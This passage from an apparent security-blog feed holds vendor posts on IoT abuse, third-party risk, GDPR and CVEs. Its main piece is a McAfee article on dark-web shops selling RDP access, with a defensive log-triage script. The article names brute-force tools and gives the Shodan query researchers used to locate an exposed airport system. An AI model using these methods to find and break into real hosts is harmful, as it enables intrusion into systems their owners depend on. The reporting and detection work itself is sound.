3) This is a pretty new problem that’s come to light, and most of the discussions about it in tech circles are filled with tech people saying, “I had no idea this was a thing until now.” If there is a local shelter for abused spouses and you’re good with this area of tech/security/privacy, you may wish to pop in and see if there’s anything you could do to help pass on useful information. It’s likely they don’t have anyone on staff who can help with this particular case. The more we share with each other, the more we can support abused partners to overcome their situations.

4) If you’ve escaped an abusive spouse but you’ve brought tech with you, there’s no guarantee it hasn’t been utterly compromised. Did both of you have admin access to the devices? Have you changed the password(s) since moving? What kind of information is revealed in the admin console? Does it mention IP addresses used, perhaps geographical location, or maybe a new email address you used to set things up again? If you’ve been experiencing strange goings on in your home since plugging everything back in, and they resemble the type of trickery listed up above, it’s quite possible the abusive partner is still up to no good.

We’ve spotted at least one example where an org has performed an IoT scrub job. The idea of “ghosting” them, which is keeping at least one compromised device running to make the abuser think all is well, is an interesting one, but potentially not without risk. If it’s at all possible, our advice is to trash all pieces of tech brought along for the ride. IoT is such a complex thing to set up, with so many moving parts, that it’s impossible to say for sure that everything has been technologically exorcised.

No quick fix

It’d be great if there was some sort of technological magic bullet that could fix this problem, but as you’ll see from digging around the “IoT scrub job” thread, a lot of security pros are only just starting to understand this type of digitized assault, as well as the best ways to go about combatting it. As with all things domestic abuse, caution is key, and we shouldn’t rush to give advice that could potentially put someone in greater danger. Frustratingly, a surprising number of the top results in search engines for help with these types of attack result in 404 error pages or websites that simply don’t exist anymore.

Clearly, we all need to up our game in technology circles and see what we can do to take this IoT-enabled horror show out of action before it spirals out of control. As IoT continues to integrate itself into people’s day-to-day existence, in ways that can’t easily be ripped out afterwards, the potential for massive harm to the most vulnerable members of society is staring us in the face. We absolutely must rise to the challenge.

The post IoT domestic abuse: What can we do to stop it? appeared first on Malwarebytes Labs.

Name That Risk: 8 Types of Third Party Risks You Should Know

There’s a lot of talk in the industry about protecting your company from third party risk, especially with the implementation of new regulations that hold organizations accountable for third party cybersecurity. While the OCC, FDIC, and the Federal Reserve all agree that vigorous due diligence and on-going third party monitoring are crucial to reducing your third party risk, it’s the wild west when it comes to agreement in practice.

Compounding this matter is the fact that the term ‘risk’ is quite broad. So broad, in fact, that no two regulators categorize risk in precisely the same way. So how can organizations solve for ‘X’ risk if we have no clear definition of risk?

The key is to develop and implement a third party risk management program with processes and metrics to assess and manage risk expectations.

When starting this process, it is good to outline the categories of risk. Here are some types of risk that are good to know due to frequency of occurrence:

  • Reputational risk—Whether a third party provider deals directly with customers or offers a service that can indirectly impact customers, it’s your reputation on the line if the third party drops the ball.
  • Operational risk—When a third party provider is integrated into internal processes, such as through the use of a cloud-based, customer relationship management solution, it increases operational complexity and risk.
  • Transactional risk—From insufficient capacity that prevents transactions from being completed to security lapses that lead to unauthorized access and misuse of data, transaction risk is one of the most commonly encountered—and highly publicized—risks a financial institution faces.
  • Credit risk—While credit risk is most frequently considered in terms of a third party’s own financial condition, credit risk also stems from the use of third parties for loan origination, underwriting, or business solicitation.
  • Compliance risk—As more laws, rules, and regulations are put into place to protect consumers, the level of compliance risk also increases. Non-compliance due to lapses by a third party provider does not indemnify a financial organization against penalties.
  • Strategic risk—Arises when a third party provider fails to meet the terms of a contract or to deliver the expected return on investment.
  • Country risk—Whenever a financial institution engages a third-party provider based in a foreign country, it is exposed to potential economic, social and political conditions related to the provider location.
  • Legal risk—The activities of a third party provider can expose a financial institution to legal expenses and possible lawsuits.

Staying ahead of all these types of risk requires more than a scorecard. Organizations need to partner with a company that provides relevant intelligence – properly aggregated, contextualized, and correlated – to your organization. It also wouldn’t hurt to have access to an analyst who can discuss the implications and potential for multiple risks on your business.

With LookingGlass’ Third Party Risk Management solution, organizations receive a 360-degree view into your vendors’ risk profile, which establishes a baseline of risk for each of your vendors, and then offers continuous third party risk monitoring so you are prepared for any kind of third party risk.

Want to learn more about our Third Party Risk Management Solution? Contact Us.


The post Name That Risk: 8 Types of Third Party Risks You Should Know appeared first on LookingGlass Cyber Solutions Inc.

GDPR, two months later

May 25 was D day, the day that the countdown to GDPR, the new General Data Protection Regulation, came to an end, and the legislation became obligatory across the whole of the European Union. Although companies had two years in which to adapt, in the end, the majority of cases saw a last-minute scramble to implement the new regulation.

Many companies were noticeably nervous and apprehensive, something that is understandable if we consider that the consequences of breaching the GDPR are severe, with fines of 10 million Euros or 2% of annual turnover (Level 1), or 20 million Euros or 4% of annual turnover (Level 2).

But now that the dust has started to settle, what assessment can we make of the situation? Have companies adjusted to the new regulation? Have they solved their doubts? Has corporate cybersecurity been standardized in Europe? Have the privacy policy update emails stopped? Has this whole process finally ended? The fact is there are still things left to do, and, if we analyze the consequences of the GDPR, we can say, broadly speaking, that there have been three different situations.


A rise in complaints in several countries

In the weeks leading up to the deadline for the new data protection regulation, large and small companies turned to all kinds of experts in order to adapt to the legislation. Not all of them, however, have managed to properly adapt. Or that, at least, is what many consumers think.

According to The Guardian, data protection agencies in many countries have reported a sharp rise in the number of complaints for apparent breaches of the GDPR: the UK Information Commissioner’s Office and the French CNIL have both reported that the number of complaints of this type has increased considerably. France, for example, has seen a 50% increase in complaints.

Google and Facebook under scrutiny

Many of the companies that were most concerned about the arrival of the GDPR were small and medium businesses. Though these companies handle less data, they also have less flexibility in their budgets, meaning that they have fewer resources to be able to adapt to the legislation. However, the reactions that we have seen in the two months since its application have gone in the opposite direction.

In fact, according to the non-profit organization NOYB (None of Your Business) most complaints have been against tech giants such as Google, Facebook, or Twitter. The reason? These large companies, rather than totally changing their data treatment policies and fully adapting them to European legislation, chose to launch a standard message, forcing users to accept their new privacy and cybersecurity policies; if users didn’t accept, their accounts would be blocked.

The other side: those who went too far the other way

Nevertheless, there was also a third case that got a lot of people talking: this is where we saw large companies that, despite the fact that they already complied with the new legislation, decided to send their users an email, asking their permission to receive notifications.

If a user chose not to accept these new policies, or simply didn’t click on the link in the email, the company that sent it would be forced to remove many users from their database – users whose permission, in fact, didn’t need to be asked.

This is what lawyer Samuel Parra believes: “There are companies that, after being incorrectly advised, sent this email asking their users for consent again, when in fact, these users’ data had been obtained legitimately, so new consent wasn’t needed.” Thus, “they now have a problem: they have found that 70 or 80% of users didn’t click on the link in the email, meaning that these companies have to delete their details from their database”, something that has meant that “several companies may have lost a large amount of future revenue, all because of some bad advice”.

Whatever the case, one thing that is true is that all companies that handle data belonging to users in the EU not only have to have their users’ permission, but they also have to establish certain corporate cybersecurity measures, such as protecting their communications (emails are the gateway for threats to your company), or implement an action and information protocol in case of possible cyberattacks.

If you’re worried about your company’s IT security, you’ll be interested to find out more about Panda Adaptive Defense, Panda’s advanced cybersecurity suite that not only acts automatically on the most frequent intrusions, but also has a human team of analysts who are able to prevent, detect and respond to cyberattacks.  What’s more, we’ve incorporated the module Panda Data Control to simplify the task of complying with the GDPR, helping you to have greater visibility and control of all personal data, including unstructured data, and to strengthen your security.

The post GDPR, two months later appeared first on Panda Security Mediacenter.

CVE-2017-7467

A buffer overflow flaw was found in the way minicom before version 2.7.1 handled VT100 escape sequences. A malicious terminal device could potentially use this flaw to crash minicom, or execute arbitrary code in the context of the minicom process.

CVE-2016-9604

It was discovered in the Linux kernel before 4.11-rc8 that root can gain direct access to an internal keyring, such as '.dns_resolver' in RHEL-7 or '.builtin_trusted_keys' upstream, by joining it as its session keyring. This allows root to bypass module signature verification by adding a new public key of its own devising to the keyring.

CVE-2018-8007

Apache CouchDB administrative users can configure the database server via HTTP(S). Due to insufficient validation of administrator-supplied configuration settings via the HTTP API, it is possible for a CouchDB administrator user to escalate their privileges to that of the operating system's user that CouchDB runs under, by bypassing the blacklist of configuration settings that are not allowed to be modified via the HTTP API. This privilege escalation effectively allows an existing CouchDB admin user to gain arbitrary remote code execution, bypassing already disclosed CVE-2017-12636. Mitigation: All users should upgrade to CouchDB releases 1.7.2 or 2.1.2.

CVE-2018-0500

Curl_smtp_escape_eob in lib/smtp.c in curl before 7.61.0 has a heap-based buffer overflow that might be exploitable by an attacker who can control the data that curl transmits over SMTP with certain settings (i.e., use of a nonstandard --limit-rate argument or CURLOPT_BUFFERSIZE value).

Happy National All American Pet Photo Day!

Today is National All American Pet Photo Day. How are you celebrating?

At Verisign, we did a quick search on NameStudioTM, our easy-to-use, domain name suggestion tool to see what interesting .com and .net domain names were available to register today … and here are some of our favorites!

AVAILABLE .COM AND .NET DOMAIN NAMES*

.COM

picswithpooch.com
happymeowblog.com
cutepetphoto.com
 petpiglet.com
fancypoodleposes.com
parakeetcorner.com
furrykisses.com
americanpetgallery.com
littleregalbeagle.com
reallycoolcat.com

.NET

picswithpooch.net
happymeowblog.net
cutepetphoto.net
petpiglet.net
fancypoodleposes.net
parakeetcorner.net
furrykisses.net
americanpetgallery.net
littleregalbeagle.net
reallycoolcat.net


What’s yours?

Tell us what great .com and .net domain names you’ve found on NameStudio here.

And check back soon to see what day we’re celebrating next. Better yet, subscribe to the Verisign blog to have the posts delivered directly to your inbox.

Happy National All American Pet Photo Day!


*Available as of July 11, 2018

The user is solely responsible for ensuring that the registration of any domain name listed herein or based on NameStudio domain search data does not violate any third-party trademarks or other intellectual property.

The post Happy National All American Pet Photo Day! appeared first on Verisign Blog.

Major International Airport’s Security System Found for Sale on Dark Web RDP Shop

The closest many of us get to the dark web is watching hackers surf it in television shows or movies. However, it is a very real place that contains lots of stolen data. This data, along with compromised systems, devices, and more are often sold in underground marketplaces that exist on the dark web. One type of marketplace is called a remote desktop protocol (RDP) shop, which provides access to stolen systems for a small fee. Found in one of these RDP shops by McAfee’s ATR team: a major international airport’s security and building automation systems, which could be purchased for only $10 USD.

You might be wondering – what does “access” mean in this scenario? Just like Spotify and Apple Music sell access to artists’ songs, or a gym sells access to its exercise machines, the dark web can sell remote access to hacked machines through these RDP shops. Once access is purchased, crooks can obtain logins to a victim’s computer system and essentially have full control of it.

Now, the McAfee ATR team is not exactly sure how the cybercriminals got their hands on these systems. But they do know that once something like an airport security system is purchased, crooks can do serious damage. This access could allow cybercriminals to do essentially anything they want – create false alerts to the internal security team, send spam, steal data and credentials, mine for cryptocurrency, or even conduct a ransomware attack on the organization.

So, what happens if your information was potentially compromised in the sale of one of these systems on the dark web? To protect your personal data from larger cybercriminal schemes that originate from RDP shops, be sure to follow these tips: 

  • Be selective about what you share. The best way to control where your information goes is by reducing the sources you share it with. That means not providing your personal information to every app, network, or system that asks for it. Be strict and diligent, and only provide something with information when it’s crucial to the service or experience it provides.
  • Set up an alert. Compromised information could potentially include financial data. Therefore, it’s best to proactively place a fraud alert on your credit so that any new or recent requests undergo scrutiny. This also entitles you to extra copies of your credit report, so you can check for anything suspicious. If you find an account you did not open, report it to the police or Federal Trade Commission, as well as the creditor involved so you can close the fraudulent account.
  • Invest in an identity theft monitoring and recovery solution. If enough personal data becomes compromised by cybercriminals accessing stolen systems, users could be potentially faced with the possibility of identity theft. That’s precisely why they should leverage a solution tool such as McAfee Identity Theft Protection, which allows users to take a proactive approach to protecting their identities with personal and financial monitoring and recovery tools to help keep their identities personal and secured.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Major International Airport’s Security System Found for Sale on Dark Web RDP Shop appeared first on McAfee Blogs.

How the Industry 4.0 Era Will Change the Cybersecurity Landscape

Today’s highly automated and connected smart factories (Industry 4.0) were born out of yesterday’s steam engines that mechanized manufacturing (Industry 1.0); mass-production lines expanded with the advent of electricity (Industry 2.0); and then IT-enabled manufacturing plants ushered in the era of connected industrial control systems with programmable logic controllers (PLC).

While enterprises struggle to enhance their operational efficiency, customer experience, logistics, and supply chain gains through IoT use, their malicious counterparts may be expending just as much resource to undermine their efforts. We have seen attacks adversely affect an enterprise’s bottom line in the past. Cases in point include a DDoS attack on Dyn’s servers that brought down major sites, including PayPal, Spotify, Netflix, and Twitter in October 2016 and an IT failure that drove British Airways to freeze thousands of its Executive Club frequent-flier accounts in March 2017 after confirming unauthorized activity from a third party.

In December last year, TRITON/TRISIS reared its ugly head, and can be considered the latest addition to ICS attackers’ armory. ICS lie at the core of the cyber-physical systems that characterize the Industry 4.0 era. The TRITON/TRISIS attack showed that at the hands of determined threat actors, a single piece of malicious code could have physical repercussions.

In the Industry 4.0 era, enterprises not only need to worry about the usual business disrupters—natural disasters, adverse publicity, and loss of key personnel, among others—but also increasingly sophisticated cyberthreats targeting critical infrastructure and the smart devices that we use to virtually control them. Modern ICS are prone to vulnerabilities that attackers can exploit to get into target networks. Industrial robots or any connected system that remains exposed can easily be scanned for vulnerabilities that, when exploited, can lead to the production of defective goods. Insufficiently secured IoT devices, when hacked, can be used to instigate DDoS and other business-crippling attacks.

We are bound to see more of these as companies increasingly embrace the advantages that smart factories, industrial robots, and the many other components that make up IIoT-enabled environments and the Industry 4.0 era offer. Enterprises will need to mitigate risks more than ever. They will need an integrated approach to security that begins with a cybersecurity framework. Any secure smart environment should have a sound foundation that uses next-generation intrusion detection and prevention, application whitelisting, integrity monitoring, virtual patching, advance sandboxing analysis, machine learning, behavior analysis, antimalware, risk detection, vulnerability assessment, next-generation firewall, anti-spear-phishing, spam protection, and data leakage technologies. Deploying a risk-reducing architecture and staying abreast of the latest in cybersecurity (threats and possible mitigation steps) by relying on trusted partners are also a must to protect all connected devices and environments on all fronts.

Read more about mitigating risks in today’s smart environments in IIoT Security Risk Mitigation in the Industry 4.0 Era.


Organizations Leave Backdoors Open to Cheap Remote Desktop Protocol Attacks

Thanks to my colleague Christiaan Beek for his advice and contributions.

While researching underground hacker marketplaces, the McAfee Advanced Threat Research team has discovered that access linked to security and building automation systems of a major international airport could be bought for only US$10.

The dark web contains RDP shops, online platforms selling remote desktop protocol (RDP) access to hacked machines, from which one can buy logins to computer systems to potentially cripple cities and bring down major companies.

RDP, a proprietary protocol developed by Microsoft that allows a user to access another computer through a graphical interface, is a powerful tool for systems administrators. In the wrong hands, RDP can be used to devastating effect. The recent SamSam ransomware attacks on several American institutions demonstrate how RDP access serves as an entry point. Attacking a high-value network can be as easy and cheap as going underground and making a simple purchase. Cybercriminals like the SamSam group only have to spend an initial $10 to get access and are charging a $40K ransom for decryption, not a bad return on investment.

A screenshot of Blackpass.bz, one of the most popular RDP-shops, largely due to the variety of services offered.

Shops explained

Security maven Brian Krebs wrote the article “Really Dumb Passwords” in 2013. That short phrase encapsulates the vulnerability of RDP systems. Attackers simply scan the Internet for systems that accept RDP connections and launch a brute-force attack with popular tools such as Hydra, NLBrute or RDP Forcer to gain access. These tools combine password dictionaries with the vast number of credentials stolen in recent large data breaches. Five years later, RDP shops are even larger and easier to access.

The McAfee Advanced Threat Research team looked at several RDP shops, ranging in size from 15 to more than 40,000 RDP connections for sale at Ultimate Anonymity Service (UAS), a Russian business and the largest active shop we researched. We also looked at smaller shops found through forum searches and chats. During the course of our research we noticed that the size of the bigger shops varies from day to day by about 10%. The goal of our research was not to create a definitive list of RDP shops; rather, we sought a better understanding of the general modus operandi, products offered, and potential victims.

The number of compromised systems claimed to be available for sale by several RDP shops. A single compromised system can appear on more than one shop’s list.

RDP access by cybercriminals

How do cybercriminals (mis)use RDP access? RDP was designed to be an efficient way to access a network. By leveraging RDP, an attacker need not create a sophisticated phishing campaign, invest in malware obfuscation, use an exploit kit, or worry about antimalware defenses. Once attackers gain access, they are in the system. Scouring the criminal underground, we found the top uses of hacked RDP machines promoted by RDP shops.

False flags: Using RDP access to create misdirection is one of the most common applications. While preserving anonymity, an attacker can make it appear as if his illegal activity originates from the victim’s machine, effectively planting a false flag for investigators and security researchers. Attackers can plant this flag by compiling malicious code on the victim’s machine, purposely creating false debugging paths and changing compiler environment traces.

Spam: Just as spammers use giant botnets such as Necurs and Kelihos, RDP access is popular among a subset of spammers. Some of the systems we found for sale are actively promoted for mass-mailing campaigns, and almost all the shops offer a free blacklist check, to see if the systems were flagged by SpamHaus and other antispam organizations.

Account abuse, credential harvesting, and extortion: By accessing a system via RDP, attackers can obtain almost all data stored on a system. This information can be used for identity theft, account takeovers, credit card fraud, extortion, and more.

Cryptomining: In the latest McAfee Labs Threats Report, we wrote about the increase in illegal cryptocurrency mining due to the rising market value of digital currencies. We found several criminal forums actively advertising Monero mining as a use for compromised RDP machines.

Monero mining via RDP advertised on a cybercriminal forum.

Ransomware: The large majority of ransomware is still spread by phishing emails and exploit kits. However, specialized criminal groups such as SamSam are known to use RDP to easily enter their victims’ networks almost undetected.

RDP shop overview

Systems for sale: The advertised systems ranged from Windows XP through Windows 10. Windows 2008 and 2012 Server were the most abundant systems, with around 11,000 and 6,500, respectively, for sale. Prices ranged from around US $3 for a simple configuration to $19 for a high-bandwidth system that offered access with administrator rights.

Third-party resellers: When comparing “stock” among several RDP shops, we found that the same RDP machines were sold at different shops, indicating that these shops act as resellers.

Windows Embedded Standard: Windows Embedded Standard, now called Windows IoT, is used in a wide variety of systems that require a small footprint. These systems can range from thin clients to hotel kiosk systems, announcement boards, point-of-sale (POS) systems, and even parking meters, among others.

Among the thousands of RDP-access systems offered, some configurations stood out. We found hundreds of identically configured Windows Embedded Standard machines for sale at UAS Shop and BlackPass; all these machines were in the Netherlands. This configuration was equipped with a 1-GHz VIA Eden processor. An open-source search of this configuration revealed that it is most commonly used in thin clients and some POS systems. The configurations are associated with several municipalities, housing associations, and health care institutions in the Netherlands.

Thin client and POS systems are often overlooked and not commonly updated, making them an ideal backdoor target for an attacker. Although these systems have a small physical footprint, the business impact of having such a system compromised should not be underestimated. As we’ve observed from previous breaches of retailers that leveraged unpatched or vulnerable POS systems, the damage extends far beyond the financial, to customer perception and long-term brand reputation. In regard to the currently affected systems we discovered, McAfee has notified the identified victims and is working to learn further detail on why and how these identical Windows systems were compromised.

Government and health care institutions: We also came across multiple government systems being sold worldwide, including those linked to the United States, and dozens of connections linked to health care institutions, from hospitals and nursing homes to suppliers of medical equipment. In a March blog post, the Advanced Threat Research team showed the possible consequences of ill-secured medical data and what can happen when an attacker gains access to medical systems. It is very troublesome to see that RDP shops offer an easy way in.

Additional products for sale

Services offered by our researched RDP shops.

In addition to selling RDP, some of these shops offer a lively trade in social security numbers, credit card data, and logins to online shops. The second-largest RDP shop we researched, BlackPass, offered the widest variety of products. The most prolific of these brokers provide one-stop access to all the tools used to commit fraud: RDP access into computers, social security numbers and other integral data to set up loans or open bank accounts.

For legal and ethical reasons, we did not purchase any of the products offered. Therefore, we cannot determine the quality of the services.

RDP ransomware attack scenario

Is it possible to find a high-value victim using an RDP shop? The Advanced Threat Research team put this theory to the test. By leveraging the vast amounts of connections offered by the RDP shops, we were able to quickly identify a victim that fits the profile of a high-value target in the United States.

We found a newly posted (on April 16) Windows Server 2008 R2 Standard machine on the UAS Shop. According to the shop details, it belonged to a city in the United States and for a mere $10 we could get administrator rights to this system.

RDP access offered for sale.

UAS Shop hides the last two octets of the IP addresses of the systems it offers for sale and charges a small fee for the complete address. (We did not pay for any services offered by UAS or any other shop.) To locate the system being sold, we used shodan.io to search for any open RDP ports at that specific organization using this query:

org:"City XXX" port:"3389"

The results were far more alarming than we anticipated. The Shodan search narrowed 65,536 possible IPs to just three that matched our query. By obtaining a complete IP address we could now look up the WHOIS information, which revealed that all the addresses belonged to a major international airport. This is definitely not something you want to discover on a Russian underground RDP shop, but the story gets worse.

From bad to worse

Two of the IP addresses presented a screenshot of the accessible login screens.

A login screen that matches the configuration offered in the RDP shop.

A closer look at the screenshots shows that the Windows configuration (preceding screen) is identical to the system offered in the RDP shop. There are three user accounts available on this system, one of which is the administrator account. The names of the other accounts seemed unimportant at first but after performing several open-source searches we found that the accounts were associated with two companies specializing in airport security; one in security and building automation, the other in camera surveillance and video analytics. We did not explore the full level of access of these accounts, but a compromise could offer a great foothold and lateral movement through the network using tools such as Mimikatz.

The login screen of a second system on the same network.

Looking at the other login account (preceding screen), we saw that it is part of a domain with a very specific abbreviation. We performed the same kind of search on the other login account and found the domain is most likely associated with the airport’s automated transit system, the passenger transport system that connects terminals. It is troublesome that a system with such significant public impact might be openly accessible from the Internet.

Now we know that attackers such as the SamSam group can indeed use an RDP shop to gain access to a potential high-value ransomware victim. We found that access to a system associated with a major international airport can be bought for only $10, with no zero-day exploit, elaborate phishing campaign, or watering hole attack required.

Anonymization

To publish our findings, we have anonymized the data to prevent any disclosure of sensitive security information.

Basic forensic and security advice

Playing hide and seek

Besides selling countless connections, RDP shops offer tips on how to remain undetected once the buyer starts using the freshly bought RDP access.

This screen from the UAS Shop’s FAQ section explains how to add several registry keys to hide user accounts.

The UAS Shop also offers a zip file with a patch that enables multiuser RDP access, which is not allowed by default on some Windows versions. The zip file contains two .reg files that alter the Windows registry and a patch that modifies termsrv.dll to allow concurrent remote desktop connections.

These alterations to the registry and to system files leave obvious traces. A patched termsrv.dll no longer carries a valid Microsoft signature, and an account hidden from the logon screen through the registry still exists in the local account database and still shows up in the output of net user. Those indicators can be helpful when investigating misuse of RDP access.

In addition to checking for these signs, it is good practice to review the Windows event and security logs for unusual logon types and RDP use. In the Security log, events 4624 (successful logon) and 4625 (failed logon) with logon type 10 (RemoteInteractive) record RDP sessions, and the TerminalServices-RemoteConnectionManager/Operational log records incoming connections with their source address (event 1149). The following screen, from the well-known SANS Digital Forensics and Incident Response poster, explains where the logs can be found.


Source: SANS DFIR Poster 2015.

Basic RDP security measures

Outside access to a network can be necessary, but it always comes with risk. We have summarized some basic RDP security measures:

  • Using complex passwords and two-factor authentication makes brute-force RDP attacks far less likely to succeed
  • Do not allow RDP connections over the open Internet; if remote access is required, place it behind a VPN or gateway
  • Lock out accounts and block or rate-limit IP addresses that have too many failed login attempts
  • Regularly check event logs for unusual login attempts
  • Consider using an account-naming convention that does not reveal organizational information
  • Enumerate all systems on the network and list how they are connected and through which protocols. This also applies to Internet of Things and POS systems.
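As an added example (not code from the McAfee post, and not a UAS tool), here is a small Python triage script that applies the log checks above to an exported Security log: successful RDP logons (event 4624, logon type 10) from outside the networks where RDP is expected, bursts of failed RDP logons (event 4625) from one source, and the combination of the two, a success right after a burst of failures, which is what a guessed or purchased credential looks like. The CSV layout and the ten sample events are constructed for this example; the five field values are the ones available in the XML of the real events.

```python
import csv
import io
import ipaddress
from collections import defaultdict
from datetime import datetime

# Constructed sample of a Security log export (NOT real data). The column
# layout is an assumption: the same five values can be pulled from the XML of
# events 4624 (logon succeeded) and 4625 (logon failed) with Get-WinEvent or
# wevtutil. LogonType 10 = RemoteInteractive (RDP); 3 = network; 7 = unlock.
SAMPLE_EXPORT = """time,event_id,logon_type,user,src_ip
2018-07-10T02:14:05,4625,10,Administrator,203.0.113.7
2018-07-10T02:14:09,4625,10,Administrator,203.0.113.7
2018-07-10T02:14:12,4625,10,admin,203.0.113.7
2018-07-10T02:14:15,4625,10,Administrator,203.0.113.7
2018-07-10T02:14:18,4625,10,Administrator,203.0.113.7
2018-07-10T02:14:20,4625,10,user,203.0.113.7
2018-07-10T02:16:40,4624,10,Administrator,203.0.113.7
2018-07-10T09:03:11,4624,10,svc_cctv,10.20.0.15
2018-07-10T09:05:00,4624,3,svc_cctv,10.20.0.15
2018-07-10T23:41:02,4624,10,svc_bms,198.51.100.23
"""

# Networks from which RDP is expected: a site policy choice, not a constant.
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
FAILED_THRESHOLD = 5      # this many failed RDP logons from one source IP ...
WINDOW_SECONDS = 300      # ... inside this window counts as brute forcing


def parse_events(text):
    """Parse the CSV export into dicts with typed fields."""
    events = []
    for row in csv.DictReader(io.StringIO(text)):
        events.append({
            "time": datetime.fromisoformat(row["time"]),
            "event_id": int(row["event_id"]),
            "logon_type": int(row["logon_type"]),
            "user": row["user"].lower(),   # Windows user names are case-insensitive
            "src_ip": ipaddress.ip_address(row["src_ip"]),
        })
    return events


def is_internal(ip):
    ip = ipaddress.ip_address(ip)
    return any(ip in net for net in INTERNAL_NETS)


def rdp_events(events):
    return [e for e in events if e["logon_type"] == 10]


def external_rdp_logons(events):
    """Successful RDP logons from outside INTERNAL_NETS. If RDP is not supposed
    to be reachable from the Internet, every entry here is a finding."""
    return [e for e in rdp_events(events)
            if e["event_id"] == 4624 and not is_internal(e["src_ip"])]


def brute_force_sources(events):
    """Map source IP -> largest number of failed RDP logons seen inside a
    sliding window of WINDOW_SECONDS, for IPs that reach FAILED_THRESHOLD."""
    failures = defaultdict(list)
    for e in rdp_events(events):
        if e["event_id"] == 4625:
            failures[e["src_ip"]].append(e["time"])
    flagged = {}
    for ip, times in failures.items():
        times.sort()
        best, start = 0, 0
        for end in range(len(times)):
            while (times[end] - times[start]).total_seconds() > WINDOW_SECONDS:
                start += 1
            best = max(best, end - start + 1)
        if best >= FAILED_THRESHOLD:
            flagged[str(ip)] = best
    return flagged


def guessed_credentials(events):
    """(user, ip) pairs where an RDP logon succeeded from an IP that was
    brute forcing: the classic sign that a password was guessed or bought."""
    sources = brute_force_sources(events)
    hits = {(e["user"], str(e["src_ip"])) for e in rdp_events(events)
            if e["event_id"] == 4624 and str(e["src_ip"]) in sources}
    return sorted(hits)


def triage(text=SAMPLE_EXPORT):
    """Run all three checks over an export and return the findings."""
    events = parse_events(text)
    return {
        "external_rdp_logons": [(e["user"], str(e["src_ip"]), e["time"].isoformat())
                                for e in external_rdp_logons(events)],
        "brute_force_sources": brute_force_sources(events),
        "guessed_credentials": guessed_credentials(events),
    }


if __name__ == "__main__":
    for key, value in triage().items():
        print(f"{key}: {value}")
```

Run it as is to see the findings on the sample; for a real investigation, pass the contents of your own export to triage(). On the sample the script flags 203.0.113.7 for six failures inside the window, reports the Administrator logon that follows from the same address as a guessed credential, and lists the late-night svc_bms logon from 198.51.100.23 as an external RDP session worth explaining. The trusted networks and the threshold are the two knobs to tune before trusting the output.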

Conclusion

Remotely accessing systems is essential for system administrators to perform their duties, yet they must take the time to set up remote access in a way that is secure and not easily exploitable. RDP shops are stockpiling addresses of vulnerable machines and have reduced the effort attackers spend selecting victims to a simple online purchase.

Governments and organizations spend billions of dollars every year to secure the computer systems we trust. But even a state-of-the-art solution cannot provide security when the backdoor is left open or carries only a simple padlock. Just as we check the doors and windows when we leave our homes, organizations must regularly check which services are accessible from the outside and how they are secured. Protecting systems requires an integrated approach of defense in depth and proactive attitudes from every employee.

The post Organizations Leave Backdoors Open to Cheap Remote Desktop Protocol Attacks appeared first on McAfee Blogs.

Is the California Consumer Privacy Act the “American GDPR”?

The new California Consumer Privacy Act is the strictest data privacy law in the U.S., but it falls far short of the GDPR. The recent Exactis data leak, which could surpass Equifax in the sheer number and scope of records exposed, has data privacy advocates calling for an “American GDPR.” While it is unlikely that… Read More

The post Is the California Consumer Privacy Act the “American GDPR”? appeared first on .

Calculating the Cost of a Data Breach in 2018, the Age of AI and the IoT

Businesses run on risk: They take a chance, place their bets in the marketplace and often reap great rewards. But when thinking about the cost of a data breach, you may wonder about the price for your company and what, exactly, is at stake.

Here’s one way to think about it: You’re more likely to experience a data breach of at least 10,000 records (27.9 percent) than you are to catch the flu this winter (5–20 percent, according to WebMD). And as in the case of the flu, it’s crucial to act quickly and seek a cure for a speedy recovery. Since data breaches cost money, it’s best to take a cost-based approach to gain an accurate perspective of the problem at hand.

Sponsored by IBM Security and independently conducted by my team at the Ponemon Institute, the 13th annual Cost of Data Breach Study includes two new factors in its analysis that influence data-breach costs: deployment of artificial intelligence (AI) and the extensive use of Internet of Things (IoT) devices.

The analysis also includes the cost of a so-called mega breach — an incident resulting in the loss of 1 million records or more — and the financial consequences of customers losing trust in your organization.

Download the complete 2018 Cost of a Data Breach Study from Ponemon Institute

The Global Cost of a Data Breach Is Up in 2018

In this year’s study, the average cost of a data breach per compromised record was $148, and it took organizations 196 days, on average, to detect a breach. Overall, we found that the total cost, per-capita cost and average size of a data breach (by number of records lost or stolen) have all increased year over year.

The average cost of a data breach increased from 2017 to 2018

Locations that experienced the most expensive data breaches include the U.S., where notification costs are nearly five times the global average, and the Middle East, which suffered the highest proportion of malicious or criminal attacks — the most expensive type of breach to identify and address. Data breaches are less expensive in Brazil and India, where detection, escalation and notification costs rank the lowest.

While the cost of a breach increased for organizations in 13 countries compared to the five-year average, it decreased in Brazil and Japan, according to this year’s report.

Based on industry and location, our data breach calculator can determine how much a security incident might cost an organization.

The Bigger the Breach, the Higher the Cost

This year’s report found that the average total cost of a breach ranges from $2.2 million for incidents with fewer than 10,000 compromised records to $6.9 million for incidents with more than 50,000 compromised records.

This graph shows the average total cost by size of the data breach for the past 3 years

But what about those massive breaches that grab national headlines? The study revealed that a mega breach (involving 1 million compromised records) could cost as much as $39.49 million. Unsurprisingly, this figure increases as the number of breached records grows. A breach involving 50 million records, for example, would result in a total cost of $350.44 million.

How Can Companies Reduce Data Breach Costs?

Among the 477 companies examined for the study, the mean time to identify a breach is still substantial (197 days), while the mean time to contain a breach is 69 days.

The good news: There are strategies to help businesses lower the potential cost of a data breach. For the fourth year running, the study found a correlation between how quickly an organization identifies and contains a breach and the total cost.

Preparation and vigilance pay: The study found that an incident response team can reduce the cost of a breach by as much as $14 per compromised record from the average per-capita cost of $148. Similarly, extensive use of encryption can cut the cost by $13 per capita.

Customer Trust Impacts the Total Cost of a Breach

Organizations around the world lost customers due to data breaches in the past year. However, businesses that worked to improve customer trust reduced the number of lost customers — thereby reducing the cost of a breach. When they deployed a senior-level leader, such as a chief privacy officer (CPO) or chief information security officer (CISO), to direct customer trust initiatives, businesses lost fewer customers and, again, minimized the financial consequences of a breach.

Additionally, organizations that offered data-breach victims identity protection kept more customers than those that did not. Companies that lost less than 1 percent of existing customers incurred an average total cost of $2.8 million — while companies that experienced a churn rate of greater than 4 percent lost $6 million on average.

Examining the Effects of AI and IoT Adoption

